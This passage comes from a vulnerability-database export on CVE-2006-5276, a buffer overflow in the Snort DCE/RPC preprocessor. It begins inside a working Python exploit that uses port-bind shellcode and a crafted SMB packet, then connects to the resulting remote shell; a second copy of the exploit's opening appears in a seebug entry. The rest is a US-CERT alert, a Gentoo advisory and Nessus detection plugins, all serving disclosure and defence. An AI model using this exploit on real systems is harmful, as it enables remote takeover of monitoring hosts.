\"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\"\nshellcode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\nshellcode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\"\nshellcode += \"\\x89\\xe1\\xcd\\x80\"\n\ndef ExploitSnort(target):\n # SMB packet borrowed from http://www.milw0rm.com/exploits/3391\n # NetBIOS Session Service\n smbreq = \"\\x00\\x00\\x02\\xab\"\n\n # SMB Header\n smbreq += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\n 
smbreq += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\n smbreq += \"\\x00\\x08\\x30\\x00\"\n\n # Tree Connect AndX Request\n smbreq += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\n smbreq += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\n smbreq += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\n smbreq += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n # NT Create AndX Request\n smbreq += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\n smbreq += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\n smbreq += \"\\x63\\x00\\x00\\x00\"\n\n # Write AndX Request #1\n smbreq += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x10\\x02\\x00\\x00\\x01\\x00\\x00\\x00\"\n smbreq += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\n smbreq += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\n smbreq += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\n smbreq += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n # Write AndX Request #2\n smbreq += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n smbreq += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\xce\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n smbreq += \"\\xed\\x1e\\x94\\x7c\\x90\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\"\n smbreq += \"\\x31\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa9\"\n # The 
following address overwrites RET and points into our shellcode\n smbreq += struct.pack('<L', 0xbfffeff0)\n smbreq += '\\x90' * 50\n smbreq += shellcode\n smbreq += '\\x90' * 130\n\n packet = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / smbreq\n send(packet)\n\ndef ConnectRemoteShell(target):\n connect = '/usr/bin/telnet ' + target + ' 4444'\n os.system(connect)\n\nif __name__ == '__main__':\n try:\n target = sys.argv[1]\n except IndexError:\n print 'Usage: %s <ip of a host on snort network>' % sys.argv[0]\n sys.exit(-1)\n\n print '[+] Sending malformed SMB packet'\n ExploitSnort(target)\n print '[+] Connecting to remote shell in 3 seconds...'\n time.sleep(3)\n ConnectRemoteShell(target)\n\n# milw0rm.com [2007-03-30]", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "cvelist": ["CVE-2006-5276"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA07-050A\r\n\r\n\r\nSourcefire Snort DCE/RPC Preprocessor Buffer Overflow\r\n\r\n Original release date: February 19, 2007\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Snort 2.6.1, 2.6.1.1, and 2.6.1.2\r\n * Snort 2.7.0 beta 1\r\n * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with\r\n SEUs prior to SEU 64\r\n * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x,\r\n and 4.6x with SEUs prior to SEU 64\r\n\r\n Other products that use Snort or Snort components may be affected.\r\n\r\n\r\nOverview\r\n\r\n A stack buffer overflow vulnerability in the Sourcefire Snort\r\n DCE/RPC preprocessor could allow an unauthenticated, remote\r\n attacker to execute arbitrary code with the privileges of the Snort\r\n process.\r\n\r\n\r\nI. Description\r\n\r\n Sourcefire Snort is a widely-deployed, open-source network\r\n intrusion detection system (IDS). 
Snort and its components are used\r\n in other IDS products, notably Sourcefire, and Snort is included\r\n with a number of operating system distributions. The DCE/RPC\r\n preprocessor reassembles fragmented SMB and DCE/RPC traffic before\r\n passing data to the Snort rules.\r\n\r\n The vulnerable code does not properly reassemble certain types of\r\n SMB and DCE/RPC packets. An attacker could exploit this\r\n vulnerability by sending a specially crafted TCP packet to a host\r\n or network monitored by Snort. The DCE/RPC preprocessor is enabled\r\n by default, and it is not necessary for an attacker to complete a\r\n TCP handshake.\r\n\r\n US-CERT is tracking this vulnerability as VU#196240. This\r\n vulnerability has been assigned CVE number CVE-2006-5276. Further\r\n information is available in advisories from Sourcefire and ISS.\r\n\r\n\r\nII. Impact\r\n\r\n A remote, unauthenticated attacker may be able to execute arbitrary\r\n code with the privilege level of the Snort preprocessor.\r\n\r\n\r\nIII. Solution\r\n\r\nUpgrade\r\n\r\n Snort 2.6.1.3 is available from the Snort download site. Sourcefire\r\n customers should visit the Sourcefire Support Login site.\r\n\r\nDisable the DCE/RPC Preprocessor\r\n\r\n To disable the DCE/RPC preprocessor, comment out the line that loads\r\n the preprocessor in the Snort configuration file (typically\r\n /etc/snort.conf on UNIX and Linux systems):\r\n\r\n [/etc/snort.conf]\r\n ...\r\n #preprocessor dcerpc...\r\n ...\r\n \r\n Restart Snort for the change to take effect.\r\n\r\n Disabling the preprocessor will prevent Snort from reassembling\r\n fragmented SMB and DCE/RPC packets. This may allow attacks to evade\r\n the IDS.\r\n\r\n\r\nIV. 
References\r\n\r\n * US-CERT Vulnerability Note VU#196240 -\r\n <http://www.kb.cert.org/vuls/id/196240>\r\n\r\n * Sourcefire Advisory 2007-02-19 -\r\n <http://www.snort.org/docs/advisory-2007-02-19.html>\r\n\r\n * Sourcefire Support Login - <https://support.sourcefire.com/>\r\n\r\n * Sourcefire Snort Release Notes for 2.6.1.3 -\r\n <http://www.snort.org/docs/release_notes/release_notes_2613.txt>\r\n\r\n * Snort downloads - <http://www.snort.org/dl/>\r\n\r\n * DCE/RPC Preprocessor -\r\n <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html>\r\n\r\n * IBM Internet Security Systems Protection Advisory -\r\n <http://iss.net/threats/257.html>\r\n\r\n * CVE-2006-5276 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA07-050A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. 
Please send\r\n email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the\r\n subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2007 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n February 19, 2007: Initial Release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP\r\nqulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq\r\n+kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6\r\nOuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w\r\nRSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg\r\n+EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg==\r\n=T7v8\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2007-02-20T00:00:00", "published": "2007-02-20T00:00:00", "id": "SECURITYVULNS:DOC:16119", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16119", "title": "US-CERT Technical Cyber Security Alert TA07-050A -- Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-5276"], "description": "Buffer overflow on DCE/RPC protocol parsing.", "edition": 1, "modified": "2007-02-20T00:00:00", "published": "2007-02-20T00:00:00", "id": "SECURITYVULNS:VULN:7267", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7267", "title": "snort IDS buffer overflow", "type": 
"securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:00", "bulletinFamily": "unix", "cvelist": ["CVE-2006-5276"], "description": "### Background\n\nSnort is a widely deployed intrusion detection program. \n\n### Description\n\nThe Snort DCE/RPC preprocessor does not properly reassemble certain types of fragmented SMB and DCE/RPC packets. \n\n### Impact\n\nA remote attacker could send specially crafted fragmented SMB or DCE/RPC packets, without the need to finish the TCP handshake, that would trigger a stack-based buffer overflow while being reassembled. This could lead to the execution of arbitrary code with the permissions of the user running the Snort preprocessor. \n\n### Workaround\n\nDisable the DCE/RPC processor by commenting the 'preprocessor dcerpc' section in /etc/snort/snort.conf . \n\n### Resolution\n\nAll Snort users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/snort-2.6.1.3\"", "edition": 1, "modified": "2007-03-02T00:00:00", "published": "2007-02-23T00:00:00", "id": "GLSA-200703-01", "href": "https://security.gentoo.org/glsa/200703-01", "type": "gentoo", "title": "Snort: Remote execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:09:58", "description": "No description provided by source.", "published": "2007-04-03T00:00:00", "title": "Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-04-03T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-6573", "id": "SSV:6573", "sourceData": "\n #!/usr/bin/python\r\n#\r\n# Remote exploit for Snort DCE/RPC preprocessor vulnerability as described in\r\n# CVE-2006-5276. 
The exploit binds a shell to TCP port 4444 and connects to it.\r\n# This code was tested against snort-2.6.1 running on Red Hat Linux 8\r\n#\r\n# Author shall bear no responsibility for any screw ups caused by using this code\r\n# Winny Thomas :-)\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nfrom scapy import *\r\n\r\n# Linux portbind shellcode; Binds shell on TCP port 4444\r\nshellcode = \"\\x31\\xdb\\x53\\x43\\x53\\x6a\\x02\\x6a\\x66\\x58\\x99\\x89\\xe1\\xcd\\x80\\x96\"\r\nshellcode += \"\\x43\\x52\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x6a\\x66\\x58\\x50\\x51\\x56\"\r\nshellcode += \"\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xd1\\xe3\\xcd\\x80\\x52\\x52\\x56\\x43\\x89\\xe1\"\r\nshellcode += \"\\xb0\\x66\\xcd\\x80\\x93\\x6a\\x02\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\r\nshellcode += \"\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\"\r\nshellcode += \"\\x89\\xe1\\xcd\\x80\"\r\n\r\ndef ExploitSnort(target):\r\n # SMB packet borrowed from http://www.milw0rm\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6573"}], "nessus": [{"lastseen": "2021-01-12T10:06:05", "description": "This build moves from manual linking to alternatives.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "published": "2007-11-06T00:00:00", "title": "Fedora 7 : snort-2.7.0.1-3.fc7 (2007-2060)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "modified": "2007-11-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:snort-postgresql+flexresp", "cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:snort-plain+flexresp", "p-cpe:/a:fedoraproject:fedora:snort-snmp+flexresp", "p-cpe:/a:fedoraproject:fedora:snort-postgresql", "p-cpe:/a:fedoraproject:fedora:snort-snmp", "p-cpe:/a:fedoraproject:fedora:snort-bloat", "p-cpe:/a:fedoraproject:fedora:snort-debuginfo", "p-cpe:/a:fedoraproject:fedora:snort", "p-cpe:/a:fedoraproject:fedora:snort-mysql+flexresp", "p-cpe:/a:fedoraproject:fedora:snort-mysql"], "id": "FEDORA_2007-2060.NASL", "href": "https://www.tenable.com/plugins/nessus/27749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-2060.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27749);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2006-5276\");\n script_xref(name:\"FEDORA\", value:\"2007-2060\");\n\n script_name(english:\"Fedora 7 : snort-2.7.0.1-3.fc7 (2007-2060)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This build moves from manual linking to alternatives.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-September/003647.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?97f7ef15\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Snort 2 DCE/RPC Preprocessor Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-bloat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-mysql+flexresp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-plain+flexresp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-postgresql+flexresp\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fedoraproject:fedora:snort-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:snort-snmp+flexresp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"snort-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-bloat-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-debuginfo-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-mysql-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-mysql+flexresp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-plain+flexresp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-postgresql-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-postgresql+flexresp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-snmp-2.7.0.1-3.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"snort-snmp+flexresp-2.7.0.1-3.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"snort / snort-bloat / snort-debuginfo / snort-mysql / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:49:08", "description": "A IBM Internet Security Systems Protection Advisory reports :\n\nSnort is vulnerable to a stack-based buffer overflow as a result of\nDCE/RPC reassembly. 
This vulnerability is in a dynamic-preprocessor\nenabled in the default configuration, and the configuration for this\npreprocessor allows for auto-recognition of SMB traffic to perform\nreassembly on. No checks are performed to see if the traffic is part\nof a valid TCP session, and multiple Write AndX requests can be\nchained in the same TCP segment. As a result, an attacker can exploit\nthis overflow with a single TCP PDU sent across a network monitored by\nSnort or Sourcefire.\n\nSnort users who cannot upgrade immediately are advised to disable the\nDCE/RPC preprocessor by removing the DCE/RPC preprocessor directives\nfrom snort.conf and restarting Snort. However, be advised that\ndisabling the DCE/RPC preprocessor reduces detection capabilities for\nattacks in DCE/RPC traffic. After upgrading, customers should\nre-enable the DCE/RPC preprocessor.", "edition": 25, "published": "2007-02-22T00:00:00", "title": "FreeBSD : snort -- DCE/RPC preprocessor vulnerability (afdf500f-c1f6-11db-95c5-000c6ec775d9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "modified": "2007-02-22T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:snort"], "id": "FREEBSD_PKG_AFDF500FC1F611DB95C5000C6EC775D9.NASL", "href": "https://www.tenable.com/plugins/nessus/24686", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24686);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-5276\");\n script_xref(name:\"CERT\", value:\"196240\");\n\n script_name(english:\"FreeBSD : snort -- DCE/RPC preprocessor vulnerability (afdf500f-c1f6-11db-95c5-000c6ec775d9)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A IBM Internet Security Systems Protection Advisory reports :\n\nSnort is vulnerable to a stack-based buffer overflow as a result of\nDCE/RPC reassembly. 
This vulnerability is in a dynamic-preprocessor\nenabled in the default configuration, and the configuration for this\npreprocessor allows for auto-recognition of SMB traffic to perform\nreassembly on. No checks are performed to see if the traffic is part\nof a valid TCP session, and multiple Write AndX requests can be\nchained in the same TCP segment. As a result, an attacker can exploit\nthis overflow with a single TCP PDU sent across a network monitored by\nSnort or Sourcefire.\n\nSnort users who cannot upgrade immediately are advised to disable the\nDCE/RPC preprocessor by removing the DCE/RPC preprocessor directives\nfrom snort.conf and restarting Snort. However, be advised that\ndisabling the DCE/RPC preprocessor reduces detection capabilities for\nattacks in DCE/RPC traffic. After upgrading, customers should\nre-enable the DCE/RPC preprocessor.\"\n );\n # http://xforce.iss.net/xforce/xfdb/31275\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cddab8bb\"\n );\n # http://www.snort.org/docs/advisory-2007-02-19.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?24d71b61\"\n );\n # https://vuxml.freebsd.org/freebsd/afdf500f-c1f6-11db-95c5-000c6ec775d9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?90a93074\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Snort 2 DCE/RPC Preprocessor Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:snort\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"snort>=2.6.1<2.6.1.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:11", "description": "The remote host is affected by the vulnerability described in GLSA-200703-01\n(Snort: Remote execution of arbitrary code)\n\n The Snort DCE/RPC preprocessor does not properly reassemble certain\n types of fragmented SMB and DCE/RPC packets.\n 
